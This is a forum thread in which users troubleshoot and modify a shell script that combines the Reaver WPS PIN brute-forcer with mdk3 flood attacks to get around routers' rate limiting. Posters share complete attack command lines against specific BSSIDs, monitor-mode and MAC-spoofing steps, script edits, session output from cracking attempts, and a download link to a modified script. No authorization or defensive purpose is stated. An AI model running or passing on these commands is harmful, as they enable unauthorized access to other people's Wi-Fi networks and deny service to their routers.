Jump to content

Reaver "AP rate limiting detected" and automatic mdk3 solution


LexMichdeappel
 Share

Recommended Posts

About 60% down the script (well, the old one at least. Just search for it) there's a chunk responsible for invoking wash with the appropriate parameters. Just search for "wash" and I'm sure it'll pop up.

Link to comment
Share on other sites

I'm getting the following error when I try to execute "reaver -i -b 00:04:DF:79:B6:6F -S -l 10 -N -vv" doesn't matter which flood attack I choose, I keep getting

No replay interface specified.

"aireplay-ng --help" for help.
Please Wait...
The script that is being executed is:

mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200 & mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200 & mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200

Any idea on how to solve this?

Link to comment
Share on other sites

This is from memory, but I believe the -i parameter to reaver should've been followed by the interface name to use, which should be something like mon0

Link to comment
Share on other sites

  • 4 months later...

I would like to offer the following humle recommendations for the ReVdK3-r2.sh script.

First is the section where we create the three new monitor segments. The problem is that the wlan0mon is defined, which is silly since we already define WLAN as a string.

So I changed this:

airmon-ng start wlan0;
iw wlan0mon interface add mon0 type monitor & iw wlan0mon interface add mon1 type monitor & iw wlan0mon interface add mon2 type monitor;

 

to this:

airmon-ng start $WLAN;

WLANxMON=$WLAN
WLANxMON+="mon"

iw $WLANxMON interface add mon0 type monitor & iw $WLANxMON interface add mon1 type monitor & iw $WLANxMON interface add mon2 type monitor;

 

The same problem arise when we want to spoof the mac address. Again we have a segment where the wlanXmon is predefined for us (which is a problem if we use wlan1)

WLAN='wlan0mon';
MON1='mon0';
MON2='mon1';
MON3='mon2';

which can be changed to this:

WLAN=$WLANxMON;
MON1='mon0';
MON2='mon1';
MON3='mon2';


I would also like to suggest a replacement where this

macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;

can be replaced with this

macchanger -a "$WLAN"> /dev/null;
macchanger -a "$MON1"> /dev/null;
macchanger -a "$MON2"> /dev/null;
macchanger -a "$MON3"> /dev/null;

but this is only relevant in the case where we want all the macs to be different. Furthermore, I am not that well into the mdk3 code so I am not sure whether it is mandatory to have the same mac on all three monitors.

Link to comment
Share on other sites

The EAPOL Start attack seems to be ineffective against the newer TP-Link routers. I tried it against an Archer8 type and although I sent about 40000 packages on each interface, the router just kept happily going.

So it would seem that the manufacturers has found a way to protect against this kind of attack.

 

Btw, the script seems to work flawlessly on my machine with the new editions.

Link to comment
Share on other sites

  • 11 months later...

Hello everybody,

Sorry for the up...but it's a very useful topic and i encounter a issue.

With the last modified version http://www.datafilehost.com/d/888bcb3c everything works until the attack with reaver begun.

It blocks on :

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[?] Restore previous session for 00:37:B7:7E:0B:BE? [n/Y] [+] p1_index set to 6
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from 00:37:B7:7E:0B:BE

and somtimes it switch to

No source MAC (-h) specified. Using the device MAC (78:03:40:02:94:8F)
22:09:04  Waiting for beacon frame (BSSID: 00:37:B7:7E:0B:BE) on channel 1
22:09:14  No such BSSID available.
Please Wait...

 

No problem when i start revear basically :

root@kaliTesting:~# reaver -i wlan1mon -b 00:37:B7:7E:0B:BE -S -c 1 -d 15 -l 10 -N -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 1
[?] Restore previous session for 00:37:B7:7E:0B:BE? [n/Y] n
[+] Waiting for beacon from 00:37:B7:7E:0B:BE
[+] Associated with 00:37:B7:7E:0B:BE (ESSID: Livebox-0BBE)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

Thank you very much and have a good day.

Link to comment
Share on other sites

  • 6 months later...

My first encounter with AP rate limiting has led me to believe that it is a curse :)

I apologize for being a retard in advance... my solution was to just to test WPS 1.0... as opposed to WPS 2.0... so I was lucky that way, I came online to find out why AP rate limiting is an issue... and I must say repzeroworld has added something I can chew upon. I have not yet encountered my cursed friend on 1.0.... now I realize this forum topic is about 2. 0 but I thought I would make the distinction... there is much i need to think about... I originally thought I could use python to script a sudo macchanger -r but that proved complicated... I'm still working on it... thank you for being here and live long and prosper... I will work on what has been written  and come back.

Link to comment
Share on other sites

  • 2 months later...

Hi , I am trying to use ReVdK3-r1.sh but no success.

The terminal auto close after i input Enter on

Quote

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x    REAVER COMMAND LINE YOU HAVE CHOOSEN     x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

reaver -i mon0 -b 70:4F:57:AA:6D:62 -S -l 10 -N -vv

Are you satisified with this configuration? if not,  input 'r' and you will be returned to Reaver's Configuration Wizard:

.
any solution ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...